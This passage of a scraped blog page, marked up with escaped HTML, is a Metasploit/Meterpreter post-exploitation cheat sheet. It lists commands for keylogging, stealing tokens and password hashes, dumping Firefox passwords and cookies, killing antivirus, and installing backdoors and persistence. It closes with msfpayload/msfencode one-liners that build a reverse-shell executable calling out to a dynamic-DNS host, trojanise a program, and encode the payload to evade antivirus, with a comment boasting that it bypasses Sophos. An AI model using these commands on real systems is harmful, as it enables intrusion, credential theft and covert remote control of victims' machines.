Process:<\/strong><\/p>\n KeyLog: <\/strong>Ensure you are monitoring the correct session (Explorer.exe\/WinLogin.exe)<\/p>\n Channels: <\/strong>This allows you to do more than one thing at a time in meterpreter<\/p>\n Session: <\/strong>Session0 is the local desktop. Session1+ are rdp sessions.<\/p>\n FileEdit: <\/strong>Ability to edit files atributes such as MACE<\/p>\n Tokens: <\/strong>Incognito allows token stealing and other token functions<\/p>\n need to wget http:\/\/lab.mediaservice.net\/code\/cachedump.rb to framework3\/modules\/post\/windows\/gather<\/p>\n Sniffer:<\/strong> Allows promiscuos mode to be enabled \ud83d\ude09<\/p>\n Meterpreter Scripts: <\/strong>These scripts perform various functions on the victim<\/p>\n One Liners<\/p>\n
2
3
4
<\/div><\/td>
\ngetpid shows meterpreter process id<\/span>
\nps<\/span> ists running processes
\nmigrate [<\/span>ps<\/span>]<\/span> migrates to given process (<\/span>one that wont end\/<\/span>crash)<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
2
3
4
<\/div><\/td>
\nkeyscan_start starts the key logger
\nkeyscan_dump outputs captured data
\nkeyscan_stop stops the keylogger<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
2
3
4
5
6
<\/div><\/td>
\nchannel -l<\/span> lists the open channels
\nread<\/span> [<\/span>channel]<\/span> outputs data from channel
\ninteract [<\/span>channel]<\/span> allows you to jump into the channel
\nwrite<\/span> [<\/span>channel]<\/span> sends data to the channel
\nclose [<\/span>channel]<\/span> kills the channel<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
2
3
4
<\/div><\/td>
\ngetdesktop shows current desktop session meterpreter is in<\/span>
\nsetdesktop changes to an already open desktop session
\nuictl disable keyboard disables the keyboard of the desktop session<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
2
3
4
<\/div><\/td>
\ntimestomp file.txt -f<\/span> sourcefile.txt copys timestamp from sourcefile.txt
\nuse priv to load the priv extras
\nhashdump to dump the SAM file<\/span> :-)<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
2
3
4
5
6
<\/div><\/td>
\nlist_tokens -u<\/span> shows stealable tokens
\nimpersonate_token allows a token to be stolen
\nsteal_token [<\/span>psid]<\/span> allows ability to steal token of a process
\nrev2self reverts to origional token
\nrun post\/<\/span>windows\/<\/span>gather\/<\/span>cachedump gets cached domain hashes<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
2
3
4
5
6
<\/div><\/td>
\nsniffer_interfaces list interface 1<\/span>,2<\/span>,3<\/span>,4<\/span>,5<\/span>,6<\/span>,etc
\nsniffer_start [<\/span>n]<\/span> starts the sniffer for<\/span> the interface
\nsniffer_stats [<\/span>n]<\/span> lists packets, time<\/span>, etc..
\nsniffer_dump [<\/span>n]<\/span> file.pcap dumps the capture locally
\nsniffer_stop you guessed it ;-)<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
2
3
4
5
6
7
8
9
10
<\/div><\/td>
\nrun credscollect dumps hashes and tokens to screen<\/span>
\nrun enum_firefox dumps temp internet files from firefox - cookies, passwords, etc :-)<\/span>
\nrun get_application_list shows installed applications
\nrun killav trys to stop all known AV progs
\nrun get_local_subnets enumerates local<\/span> subnet info
\nrun metsvc creates a backdoor
\nrun persistence survices a reboot (<\/span>without admin or system)<\/span>
\nrun schedulme -e<\/span> file.exe -m<\/span> 30<\/span> you'll need to man load the meterpreter.exe payload
\nrun kitrap0d allows priv escalation using CVE-2010-0232<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\nweb browser exploit<\/h2>\n
2
3
4
5
6
<\/div><\/td>
\nset<\/span> LHOST [<\/span>local_ip]<\/span>
\nset<\/span> SRVPORT 80<\/span>
\nset<\/span> URIPATH \/<\/span>
\nrun
\n#now get the client to connect to you (use ettercap dns)<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\ninbuilt sqlite db<\/h2>\n
2
3
4
5
6
7
<\/div><\/td>
\ndb_connect job \u00a0 \u00a0 \u00a0 creates a new db called job and connects to it
\ndb_hosts \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0shows hosts
\ndb_services \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 shows visible services
\ndb_nmap -sS<\/span> [<\/span>target_ip]<\/span> \u00a0 \u00a0 performs nmap<\/span> against target and stores in<\/span> db
\ndn_import_nmap_xml \u00a0 \u00a0 \u00a0 \u00a0allows inport
\ndb_autopwn -p<\/span> -e<\/span> -r<\/span> -t<\/span> \u00a0 \u00a0 \u00a0 \u00a0 autoown from db vulns<\/div><\/td><\/tr><\/tbody><\/table><\/div>\nMeterpreter Payload\u00a0Backdoor<\/h2>\n
2
3
4
5
6
<\/div><\/td>
\n.\/<\/span>msfpayload windows\/<\/span>meterpreter\/<\/span>reverse_tcp LHOST<\/span>=phillipshome.getmyip.com LPORT<\/span>=4444<\/span> R |<\/span> .\/<\/span>msfencode -e<\/span> x86\/<\/span>shikata_ga_nai -c<\/span> 5<\/span> -t<\/span> exe -o<\/span> encoded.exe
\nsets the payload as<\/span> meterpreter and then<\/span> encodes it 5<\/span> times<\/span> to bypass AV
\n.\/<\/span>msfpayload windows\/<\/span>meterpreter\/<\/span>reverse_tcp LHOST<\/span>=phillipshome.getmyip.com LPORT<\/span>=4444<\/span> R |<\/span> .\/<\/span>msfencode -t<\/span> exe -x<\/span> \/<\/span>mnt\/<\/span>hgfs\/<\/span>tools\/<\/span>exploits\/<\/span>spider.exe -k<\/span> -o<\/span> \/<\/span>share\/<\/span>spider.exe -e<\/span> x86\/<\/span>shikata_ga_nai -c<\/span> 5<\/span>
\n#this fucker bypasses sophos :-)<\/span>
\n.\/<\/span>msfcli exploit\/<\/span>multi\/<\/span>handler PAYLOAD<\/span>=windows\/<\/span>meterpreter\/<\/span>reverse_tcp LHOST<\/span>=192.168.1.120 LPORT<\/span>=4444<\/span> E<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n